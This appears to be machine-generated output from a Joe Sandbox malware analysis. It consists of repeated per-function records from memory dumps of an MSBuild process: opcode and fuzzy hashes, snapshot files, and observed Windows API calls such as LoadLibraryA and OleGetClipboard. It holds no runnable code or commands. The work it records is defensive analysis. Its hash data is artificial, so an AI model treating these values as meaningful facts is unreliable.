• Instruction ID: 91f67cb85a5a77bdb3a7e2e07ea088e564b49481855d686f64bce5bee413e046
• Opcode Fuzzy Hash: 08ef4b98fa5dd6ecb4fb5e5133bbe36d0288d71cb8a36caa5ad9246b3a081261
• Instruction Fuzzy Hash: 2541B1B1D107499FDF54CF99C884ADEBBB5FF48314F24812AE819AB210E7759885CF90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Graph (rendered image not included): basic blocks 68788d4-687903c; calls CallWindowProcW in block 6878fba-6878ff2; internal call to 68722ac
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 06878FE1
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 918f6c68a71eb8499c414f83e109e851c86830a739051a859ac36e3a882c1806
• Instruction ID: 488b1c6a4699cd32914015c215a110330226858742f2b629ac4589c3b4302f7d
• Opcode Fuzzy Hash: 918f6c68a71eb8499c414f83e109e851c86830a739051a859ac36e3a882c1806
• Instruction Fuzzy Hash: 7F4129B4A002498FDB54CF99C488AAEBBF6FF88314F14C459E519AB321D774E845CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Graph (rendered image not included): basic blocks 121cc64-121cd95; calls LoadLibraryA in block 121cd00-121cd4a
APIs
• LoadLibraryA.KERNELBASE(?), ref: 0121CD3A
Memory Dump Source
• Source File: 00000009.00000002.526368484.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1210000_MSBuild.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: bdca508e263bada77a9a842bc4b41e32efe3202c171d6a62db3553128d91baa8
• Instruction ID: 5a6da457753b8dde19a18c850c9b66a8f0b01b8cffb986c7afcd324821ac7c04
• Opcode Fuzzy Hash: bdca508e263bada77a9a842bc4b41e32efe3202c171d6a62db3553128d91baa8
• Instruction Fuzzy Hash: 8B3140B4D6028A8FDB14CFA9C88579EBFF5BB18314F148129E806A7284D7789881CF91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Graph (rendered image not included): basic blocks 1219fdc-121cd95; calls LoadLibraryA in block 121cd00-121cd4a
APIs
• LoadLibraryA.KERNELBASE(?), ref: 0121CD3A
Memory Dump Source
• Source File: 00000009.00000002.526368484.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1210000_MSBuild.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 8a83a5ae7cf24ba24833cba325ce18926f615105a6eeec2f46bf6230eb09dffd
• Instruction ID: 12c7031c5866f6e9e09212a6190b6740b2286431c2924d1abda86eb096d45533
• Opcode Fuzzy Hash: 8a83a5ae7cf24ba24833cba325ce18926f615105a6eeec2f46bf6230eb09dffd
• Instruction Fuzzy Hash: 5E3162B4D202498FDB14CFA9C88579EBFF4FB18314F10812AE806A7384D7749891CF81
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Graph (rendered image not included): basic blocks 6878c24-6879ef7; calls OleGetClipboard in block 6878c24-6879e90
APIs
• (no entries listed; the graph shows the OleGetClipboard call)
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: Clipboard
• String ID:
• API String ID: 220874293-0
• Opcode ID: 267fbc730b29f056de62c3a8af9f80f5d89b2a995f0300762b09787b76627c53
• Instruction ID: 631c4ad12913c49fb01decda1850cef348b889038ff26f90ebfe24bd82a83f6a
• Opcode Fuzzy Hash: 267fbc730b29f056de62c3a8af9f80f5d89b2a995f0300762b09787b76627c53
• Instruction Fuzzy Hash: EC31D0B0E0124CDFDB50CF99C884BDEBBF5BB48318F148029E504AB394D7B5A945CBA2
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Graph (rendered image not included): basic blocks 6877c68-6877d22; calls DuplicateHandle in block 6877c68-6877cfc
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06877CEF
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 00a6eb0310d2c09fb22522e2aa303a343a190a1220206a4c0c0c6bea979df234
• Instruction ID: 562ea69230d25de71a84f3391b9fca61bec25d3dbb4ebc9f5df67c25a5288150
• Opcode Fuzzy Hash: 00a6eb0310d2c09fb22522e2aa303a343a190a1220206a4c0c0c6bea979df234
• Instruction Fuzzy Hash: 5021C2B59012489FDF10CFAAD884ADEBBF8FB48324F14841AE914A7350D374A954CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Graph (rendered image not included): basic blocks 1215038-121510e; calls RtlEncodePointer in block 12150a2-12150d3
APIs
• RtlEncodePointer.NTDLL(00000000), ref: 012150C2
Memory Dump Source
• Source File: 00000009.00000002.526368484.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1210000_MSBuild.jbxd
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
• Opcode ID: d5004c784c5414946bd6208522ed1c44ed1ad2951e6c076f90a1d49d9b5dfaa4
• Instruction ID: b99ef351613289cb6d3e4f780528abc5e9ff87edddfc215a6ffe29684b219e23
• Opcode Fuzzy Hash: d5004c784c5414946bd6208522ed1c44ed1ad2951e6c076f90a1d49d9b5dfaa4
• Instruction Fuzzy Hash: CB21DE719103868FCB10CFA8C8087DEBFF4FB4A314F14886AD408A3645C7396544CFA2
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2553 1215048-121508a 2556 1215090 2553->2556 2557 121508c-121508e 2553->2557 2558 1215095-12150a0 2556->2558 2557->2558 2559 1215101-121510e 2558->2559 2560 12150a2-12150d3 RtlEncodePointer 2558->2560 2562 12150d5-12150db 2560->2562 2563 12150dc-12150fc 2560->2563 2562->2563 2563->2559
APIs
• RtlEncodePointer.NTDLL(00000000), ref: 012150C2
Memory Dump Source
• Source File: 00000009.00000002.526368484.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1210000_MSBuild.jbxd
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
• Opcode ID: a9feda46185bd9f0224f776172082869abf373d8efc77bc4dfb510af9cae32ae
• Instruction ID: 372fa4881b7b5c3da5968d8f5a4f766fa466ff1f149eaf0b3df398b8fd6cebe5
• Opcode Fuzzy Hash: a9feda46185bd9f0224f776172082869abf373d8efc77bc4dfb510af9cae32ae
• Instruction Fuzzy Hash: DC119A7091134A8FCB10DFA9C8087CEBBF4FB89324F10C86AD508A3645DB796544CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 06875216
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: ec94d9d9294caf3d67445c3606874e500051a722ed31f7bc67792428375ec28b
• Instruction ID: f090706ee1151b4c29cd2372ba8a2bc3970ecec3b7a222b69b8611c623f5d7c6
• Opcode Fuzzy Hash: ec94d9d9294caf3d67445c3606874e500051a722ed31f7bc67792428375ec28b
• Instruction Fuzzy Hash: 631102B5D006498FDB10CF9AD444BDEFBF8EB88224F10841AD929B7600D775A545CFA2
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,068792E7), ref: 0687937F
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: fea820ba2090b5f905210688aa774cf3a1e76e5c703d4749d704fbb83c7ca6da
• Instruction ID: f8859f949448cd80b7f64f8870de80d5a5b35e1100fcf7e55382c92de292d225
• Opcode Fuzzy Hash: fea820ba2090b5f905210688aa774cf3a1e76e5c703d4749d704fbb83c7ca6da
• Instruction Fuzzy Hash: 2811F2B19042498FCF10DF9AD488B9EFBF8EB88324F15841AD519A7340D775A944CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 06879905
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 7b0ad86770b02f13250f29dc3f04a74a0f4d89d760ebc29bcac95b8c870e9730
• Instruction ID: 12d20e4da2ba7ec1f5ce16cc30aa3c706d0c06e1eb07d25599eb57f206c2c4f4
• Opcode Fuzzy Hash: 7b0ad86770b02f13250f29dc3f04a74a0f4d89d760ebc29bcac95b8c870e9730
• Instruction Fuzzy Hash: DE1122B18042888FDF10CF9AD848BDEBBF8EB48328F14845AD518A7301D374A944CFA2
Uniqueness
Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 06879905
Memory Dump Source
• Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: ed88d75834b164492934963bb16d81e874f4ebb9f2ae7e717909994eb7c509f0
• Instruction ID: 32f933d663b6650485235c670399495a71908458635e2dbe3a697aba583da3f1
• Opcode Fuzzy Hash: ed88d75834b164492934963bb16d81e874f4ebb9f2ae7e717909994eb7c509f0
• Instruction Fuzzy Hash: 171100B19002888FDF10DF9AD488BDEBBF8EB48228F14845AD529A7300D374A944CFA1
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID: P@$m
• API String ID: 0-1480106301
• Opcode ID: 0c79a30ec3a4029f213ff6594b2d89fec2816d8a5ab1ba2f2b5857b13d9a3221
• Instruction ID: 1745cd5aaf46af294d2ca7039c7e2af369aeab5d605fef42f727bb8c31183b16
• Opcode Fuzzy Hash: 0c79a30ec3a4029f213ff6594b2d89fec2816d8a5ab1ba2f2b5857b13d9a3221
• Instruction Fuzzy Hash: 2A31B071B001458FDB54AF74D8646AEB7F2AF88244B148969E447EB368DF39CC42CB91
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID: P@$m
• API String ID: 0-1480106301
• Opcode ID: 4a199c8fc57a73bd7c09309dd24a077e8d59fd39c12a480bdae49560cd377820
• Instruction ID: 6803a8a77bcfac32ba8198324f51918b6b6051eab5584d0a5dbd0a4174f632e1
• Opcode Fuzzy Hash: 4a199c8fc57a73bd7c09309dd24a077e8d59fd39c12a480bdae49560cd377820
• Instruction Fuzzy Hash: 3931C071B041458FDB58AF74D4246AEB7F2AF88244B10CA69E407EB358DF39DC41CB91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8f8db432521f8a092950916fbd182a859c84f7e15f1fdbdf1918169cf0927a9
• Instruction ID: 57b4043527796f109afce6f368572e66c7c1930ca5d4b1c11e7b7470f5020f77
• Opcode Fuzzy Hash: d8f8db432521f8a092950916fbd182a859c84f7e15f1fdbdf1918169cf0927a9
• Instruction Fuzzy Hash: 2F4153B25093808FD7479B24C8A0766BFB1DF06214F19C5DBD8C58F293D22A994AD762
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4821c57f5ad7ae7f0845e83305bf4b70f2f5bc6cb7a1e2b17cc6d9dd7398730a
• Instruction ID: ae14a3b44f54ae33ea062566298bdf632452670e12dff231f157734e6c99e4ab
• Opcode Fuzzy Hash: 4821c57f5ad7ae7f0845e83305bf4b70f2f5bc6cb7a1e2b17cc6d9dd7398730a
• Instruction Fuzzy Hash: DCE19238B1A3C55FD343D734AC15AA67FF29F96304F1A84A6E548CF2A3D6298C068761
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b84cbaf7007d16ea4bf62b2d6109e2de2de4e7f69c9743789cab0e676b6513da
• Instruction ID: 2befa377128346e533e7680d546eb8bcdc060900efd626e5a6a04b87d51b45d0
• Opcode Fuzzy Hash: b84cbaf7007d16ea4bf62b2d6109e2de2de4e7f69c9743789cab0e676b6513da
• Instruction Fuzzy Hash: 54E19D75F002058FEB54DBB8D844AADBBF2EF89215F248969E506DB3A0EB35DC41CB50
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 483f60cb07db04141e43f02cfd6e915fda5b07e29b3055054c0d86a3494f11d6
• Instruction ID: bbb559e385ee3102fb93267d5114a7726f44a983dd9c714eed65bf105798f59f
• Opcode Fuzzy Hash: 483f60cb07db04141e43f02cfd6e915fda5b07e29b3055054c0d86a3494f11d6
• Instruction Fuzzy Hash: 78E18730A00214CFCB64EFB4D458AADBBF2EF88355F158969E40A9B390DB399C05CF94
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2c0f57051427a9e49287e2431128486fa73639a7b78fe4a9449db4bef2b4b6bf
• Instruction ID: b7731d7b8ab2afd7a531d4dd462325efa34ac7eb38759d4dadb78a3ae05699c2
• Opcode Fuzzy Hash: 2c0f57051427a9e49287e2431128486fa73639a7b78fe4a9449db4bef2b4b6bf
• Instruction Fuzzy Hash: 045133B240D3C19FD7439760C8A5756BF70AB13224F1D81DBE9C5CE293D22A994AC763
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7b60dafadaaf0538f49da8cb35f47dae19d578005422f5787429faabb98ab798
                                                                                                                                        • Instruction ID: d7a800f843c6dde76ca347e721934bfa4e103c7d1506e0d84923d66f2e8ad674
                                                                                                                                        • Opcode Fuzzy Hash: 7b60dafadaaf0538f49da8cb35f47dae19d578005422f5787429faabb98ab798
                                                                                                                                        • Instruction Fuzzy Hash: 8591C071F042068FEB50DBB8D8447AEBBF2EB85214F248876E509DB251EB34DC01CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c235b034095e8d633f16739bf193f6b3438cf53766a721e51e2370d09faf3f9a
                                                                                                                                        • Instruction ID: 75ee0e7dd430aa7df327385d8509b8e9a67156e313df9009eecf0d401529c480
                                                                                                                                        • Opcode Fuzzy Hash: c235b034095e8d633f16739bf193f6b3438cf53766a721e51e2370d09faf3f9a
                                                                                                                                        • Instruction Fuzzy Hash: 72A19075A04249DFCF06CFA4C844AEEBFB6FF89300F148959E905AB2A1D734D855CBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 65e43325e396311cd50fcdadee3752a5adb3c35fa175e115911e67c9476aaada
                                                                                                                                        • Instruction ID: ae07e0c954f9a752b47bfde77b54f64d17d5fb9c01a50978ef0fd4a40b69121a
                                                                                                                                        • Opcode Fuzzy Hash: 65e43325e396311cd50fcdadee3752a5adb3c35fa175e115911e67c9476aaada
                                                                                                                                        • Instruction Fuzzy Hash: 3671E230F002418BEB648F78C8447ADBBB2EF85344F24C66AD5599F3D9DB768845C791
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e992ccaea2e8eaf67874eb15d0996d6fc4b49d7cc648512bb8e263173c2bbeb0
                                                                                                                                        • Instruction ID: 8ad68fe3f1ef73a9fd5f053b8be45aced19e69a0060c3cbd8d2b3b0c874d3610
                                                                                                                                        • Opcode Fuzzy Hash: e992ccaea2e8eaf67874eb15d0996d6fc4b49d7cc648512bb8e263173c2bbeb0
                                                                                                                                        • Instruction Fuzzy Hash: BB714A34B002058FDB56DF68C898A7E7BF9AF49604F1948AAE805CB3B1DB74DC41CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d5658336de58d993a51f30953bc58c75ead442be8567070f621ea3ebcb0eb6f2
                                                                                                                                        • Instruction ID: 27889c9217a7325f229690af037b348e2f301e7ba4fdeb844f76ca48a05f0b79
                                                                                                                                        • Opcode Fuzzy Hash: d5658336de58d993a51f30953bc58c75ead442be8567070f621ea3ebcb0eb6f2
                                                                                                                                        • Instruction Fuzzy Hash: C551137DD01359DFCB40EFB5E89598DBBB2BF48304B118A26D418AB328DB346951CF80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a8eb09e63898bdd5177110df40aa92f013519e172521bd1687f9593245793c2d
                                                                                                                                        • Instruction ID: 3a220ab378e4675480bdb4dbfca7f0284ef61f60faf61a8fc056eb32f0083a55
                                                                                                                                        • Opcode Fuzzy Hash: a8eb09e63898bdd5177110df40aa92f013519e172521bd1687f9593245793c2d
                                                                                                                                        • Instruction Fuzzy Hash: 3651F27DD01359DFCB40EFB5E89598DBBB2BF48304B118A26D419AB328DB346951CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3394eed60ab43782d927b4bbb5bcd501632cd3cb365fe2abb4a56ca5c7cb09e7
                                                                                                                                        • Instruction ID: a045f080fb95525f56c6842b6e23d8a123daf15ff6196c86f9b4dc59402678c1
                                                                                                                                        • Opcode Fuzzy Hash: 3394eed60ab43782d927b4bbb5bcd501632cd3cb365fe2abb4a56ca5c7cb09e7
                                                                                                                                        • Instruction Fuzzy Hash: ED41C231A04249DFDF52CFA4CC44AAEBFB6FF49310F048955E915AB2A1D335E924CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: be61d2d9925a8b88b00e77b3f202f69b198358230ab060c3a436f8f476268f73
                                                                                                                                        • Instruction ID: b3fb2984c166140f04cb55e999564738c335e38f3021afe42dcf9e2735b5a6df
                                                                                                                                        • Opcode Fuzzy Hash: be61d2d9925a8b88b00e77b3f202f69b198358230ab060c3a436f8f476268f73
                                                                                                                                        • Instruction Fuzzy Hash: CA31A2755093809FD743CB20C890B56BFB1EF46214F18C5DBD8C98B693C33A994ACB62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525388724.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_104d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e7fba50ddfc95591d2e172cf18d170e7ea34478ed82aa122ca9f8db7b60f04a5
                                                                                                                                        • Instruction ID: aac3a8c459e92addd9e8cd3a2292503fc17152cd792c807ce7fc265793a31442
                                                                                                                                        • Opcode Fuzzy Hash: e7fba50ddfc95591d2e172cf18d170e7ea34478ed82aa122ca9f8db7b60f04a5
                                                                                                                                        • Instruction Fuzzy Hash: 5121F1F1504244EFDB01DF94D8C0B6ABBA5FBE4324F24C5B9E9494B206C736E856C7A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c5a79a283804a138ed54d00fbcb87d99c7b735d8c95ad000b7a312964f2bc754
                                                                                                                                        • Instruction ID: d42f1be09bab09ce9e5c69bba4dbd202b00e0e9a691516432324c42d72dedee0
                                                                                                                                        • Opcode Fuzzy Hash: c5a79a283804a138ed54d00fbcb87d99c7b735d8c95ad000b7a312964f2bc754
                                                                                                                                        • Instruction Fuzzy Hash: 1D2103B1604244AFCB85DF14D8C0B2BFFA5EB84314F24C9A9EDC94B246CB36D946CA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6f59fbcc6612eb511ddc441c2dbff19acf3966885d0e6235d3064b24943d0e7d
                                                                                                                                        • Instruction ID: e69551108bff03ddca4f2b79a44479df75892855abe6f847ed7d4a1ff5c3bbaf
                                                                                                                                        • Opcode Fuzzy Hash: 6f59fbcc6612eb511ddc441c2dbff19acf3966885d0e6235d3064b24943d0e7d
                                                                                                                                        • Instruction Fuzzy Hash: E92122B1504240DFDB85DF14C4C0B2BFBA5FB84218F20C6ADE9894B242E736D946C662
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dcf28313201249ba5b460d8b33ad21aa4f2cd6568bf687fd5547a4a130b7520a
• Instruction ID: 39dc12a339931444b307dfdbd365fc26d223a202cc2c92e3dd8e53c15802b632
• Opcode Fuzzy Hash: dcf28313201249ba5b460d8b33ad21aa4f2cd6568bf687fd5547a4a130b7520a
• Instruction Fuzzy Hash: F8215A20E0438087EBB58B7D858436D7FA2DF92288F28C59AC09D4E6DED777C4468362
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 92b9fcbc56d26a7c88c8926f224a16ada408174ef1b77ab26b109b8f7ea573c2
                                                                                                                                        • Instruction ID: f90339571faeace6e9e4bb206ca0b63e3fbb36bf298d3165d9fdc0dde00ac697
                                                                                                                                        • Opcode Fuzzy Hash: 92b9fcbc56d26a7c88c8926f224a16ada408174ef1b77ab26b109b8f7ea573c2
                                                                                                                                        • Instruction Fuzzy Hash: 7A212171E102098BDB20DFA9D8807EEFBF4FB49360F188D29E009EB344C631E8408B60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

